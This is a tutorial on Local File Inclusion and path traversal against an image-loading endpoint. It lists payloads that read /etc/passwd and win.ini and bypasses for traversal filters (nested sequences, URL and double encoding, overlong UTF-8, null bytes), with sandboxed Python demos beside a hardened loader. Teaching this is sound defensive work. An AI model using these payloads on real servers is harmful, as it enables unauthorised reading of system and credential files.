Local File Inclusion
PRACTICE ! PRACTICE ! PRACTICE !
Suppose, for example, a website renders images through an application running in the backend. Usually the images are loaded via HTML links, such as an image tag whose src points at an endpoint like loadImage. The loadImage endpoint takes a filename parameter and returns the content of the specified file. On Linux the images are stored on disk under /var/www/images by default, so the application reads the requested file from that directory by appending the user-supplied filename to it; nothing stops the filename from walking back up out of that directory.
Sample Linux and Windows based LFI payloads: on Linux, filename=../../../etc/passwd reads the password file; on Windows, filename=..\..\..\windows\win.ini reads win.ini. Each ../ (or ..\) steps one directory up from /var/www/images before the target path is appended.
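As an added example (not code from the original page), here is a minimal Python model of the loadImage endpoint described above, placed beside a hardened version that pins every request to the image directory. The directory tree, the fake image and the fake passwd file are constructed in a temporary sandbox so the script runs offline; the function names and the sandbox layout are assumptions made for the demonstration.

```python
import os
import tempfile
from typing import Dict, Tuple


def load_image_vulnerable(image_dir: str, filename: str) -> bytes:
    """Mirrors the loadImage endpoint in the text: append the filename to the
    image directory and read whatever is there, with no validation at all."""
    # os.path.join discards image_dir entirely when filename is absolute.
    path = os.path.join(image_dir, filename)
    with open(path, "rb") as fh:
        return fh.read()


def load_image_safe(image_dir: str, filename: str) -> bytes:
    """Hardened version: canonicalise the final path and refuse anything that
    does not stay inside image_dir. Because the check runs on the resolved
    path it catches ../ sequences, absolute paths and symlinks alike."""
    base = os.path.realpath(image_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to read outside {base}: {filename!r}")
    with open(target, "rb") as fh:
        return fh.read()


def build_sandbox() -> Tuple[str, str]:
    """Constructed tree: <root>/var/www/images/218.png (the legitimate image)
    and <root>/etc/passwd (the target outside the image directory)."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    image_dir = os.path.join(root, "var", "www", "images")
    os.makedirs(image_dir)
    with open(os.path.join(image_dir, "218.png"), "wb") as fh:
        fh.write(b"\x89PNG fake image bytes")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "wb") as fh:
        fh.write(b"root:x:0:0:root:/root:/bin/bash\n")
    return root, image_dir


def run_demo() -> Dict[str, object]:
    """Try a legitimate name, the Linux traversal payload and an absolute path
    against both implementations and report what each one did."""
    root, image_dir = build_sandbox()
    payloads = {
        "legit": "218.png",
        "traversal": "../../../etc/passwd",  # images -> www -> var -> root
        "absolute": os.path.join(root, "etc", "passwd"),
    }
    # The Windows payload ..\..\..\windows\win.ini is not exercised here:
    # os.path.join only treats backslashes as separators on Windows.
    results: Dict[str, object] = {}
    for name, payload in payloads.items():
        results["vuln_" + name] = load_image_vulnerable(image_dir, payload)
        try:
            load_image_safe(image_dir, payload)
            results["safe_" + name] = "allowed"
        except PermissionError:
            results["safe_" + name] = "blocked"
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:16} {value!r}")
```

The vulnerable function serves the legitimate image, the traversal payload and the absolute path equally happily; the hardened one serves only the first. Note that the containment check compares canonical paths, which is what a simple "does it contain ../" string filter fails to do.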
If supplying a plain dot-dot-slash (../) sequence returns a 404 not found, the application running in the backend is stripping or blocking the directory traversal sequence from the user-supplied filename.
If the application only blocks the dot-dot-slash sequence but never pins the final path to the image directory, exploitation is even easier: supply the exact filesystem path instead, such as filename=/etc/passwd.
If neither of the previous two methods works, try nested traversal sequences such as ....// or ....\/. These collapse back into a valid traversal sequence when the backend strips the inner ../ (or ..\) once and does not re-check the result.
NOTE => Each nested block must reduce to exactly ../ (two dots and a slash) after the strip, for example ....//....//....//etc/passwd becomes ../../../etc/passwd. A filter that strips recursively until nothing changes is not fooled by this.
If none of the above methods work, we end up encoding our traversal payload.
In some contexts, such as the URL path or the filename parameter of a multipart/form-data request, the web server strips directory traversal sequences before passing the input to the backend; if the backend then URL-decodes the input before using it, the stripping can be bypassed by URL-encoding the ../ characters (%2e%2e%2f) or, when the server decodes once before stripping, by double-encoding them (%252e%252e%252f).
Various non-standard encodings, such as ..%c0%af (an overlong UTF-8 encoding of /) or ..%ef%bc%8f (the UTF-8 encoding of the fullwidth solidus U+FF0F), may also work in some cases.
If the backend requires the user-supplied filename to end with an expected extension such as .png, a NULL byte (%00) may effectively terminate the file path before the required extension, for example filename=../../../etc/passwd%00.png. This only works where the underlying file API treats the null byte as a string terminator; PHP has rejected paths containing null bytes since 5.3.4, so this is mostly a legacy trick.
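The bypass ladder above, as one added Python example (not code from the original page): each hypothetical filter stands in for one of the sanitisation behaviours described, and resolve() shows which path the backend would actually open for each payload, modelling the application as appending the filtered name to /var/www/images. The filter names, labels and payloads are constructed for the demonstration; the null-byte truncation is modelled explicitly because modern runtimes no longer truncate.

```python
import posixpath
from typing import Callable, Dict, Optional
from urllib.parse import unquote

IMAGE_DIR = "/var/www/images"  # default image directory named in the text

Filter = Callable[[str], Optional[str]]


def strip_traversal_once(raw: str) -> Optional[str]:
    """Hypothetical filter: strip '../' from the decoded name, but only once."""
    return unquote(raw).replace("../", "")


def block_traversal(raw: str) -> Optional[str]:
    """Hypothetical filter: reject any '../', but never pin the path to IMAGE_DIR."""
    name = unquote(raw)
    return None if "../" in name else name


def strip_then_decode(raw: str) -> Optional[str]:
    """Hypothetical front end: decode once and strip '../'; the application
    behind it decodes a second time before using the name."""
    cleaned = unquote(raw).replace("../", "")
    return unquote(cleaned)


def require_png(raw: str) -> Optional[str]:
    """Hypothetical filter: require a .png suffix, then hand the name to a
    C-style API that stops at the first NUL (modelled by the split)."""
    name = unquote(raw)
    if not name.endswith(".png"):
        return None
    return name.split("\x00", 1)[0]


def resolve(filter_fn: Filter, raw: str) -> Optional[str]:
    """Path the backend would open, or None if the filter rejected the input."""
    name = filter_fn(raw)
    if name is None:
        return None
    # posixpath.join discards IMAGE_DIR when name is absolute, like os.path.join.
    return posixpath.normpath(posixpath.join(IMAGE_DIR, name))


def escaped(path: str) -> bool:
    """True when the resolved path lies outside IMAGE_DIR."""
    return posixpath.commonpath([IMAGE_DIR, path]) != IMAGE_DIR


# Constructed attempts: (label, filter, payload as it would appear in the query string)
ATTEMPTS = [
    ("strip_once/plain", strip_traversal_once, "../../../etc/passwd"),
    ("strip_once/nested", strip_traversal_once, "....//....//....//etc/passwd"),
    ("block/plain", block_traversal, "../../../etc/passwd"),
    ("block/absolute", block_traversal, "/etc/passwd"),
    ("strip_then_decode/single", strip_then_decode,
     "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"),
    ("strip_then_decode/double", strip_then_decode,
     "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"),
    ("png/plain", require_png, "../../../etc/passwd"),
    ("png/nullbyte", require_png, "../../../etc/passwd%00.png"),
]


def run_attempts() -> Dict[str, Optional[str]]:
    """Resolve every payload through its filter; the second entry of each pair
    is the bypass the text describes for that filter."""
    return {label: resolve(fn, payload) for label, fn, payload in ATTEMPTS}


if __name__ == "__main__":
    for label, path in run_attempts().items():
        verdict = "rejected" if path is None else ("ESCAPED" if escaped(path) else "contained")
        print(f"{label:26} {verdict:10} {path}")
```

Read the output pairwise: the plain payload against each filter lands inside /var/www/images or is rejected (the 404 described above), while the nested sequence, the absolute path, the double-encoded sequence and the null byte each reach /etc/passwd. The non-standard encodings (..%c0%af, ..%ef%bc%8f) are not modelled because their effect depends on how the target's own decoder treats malformed or fullwidth characters, not on anything Python's unquote does.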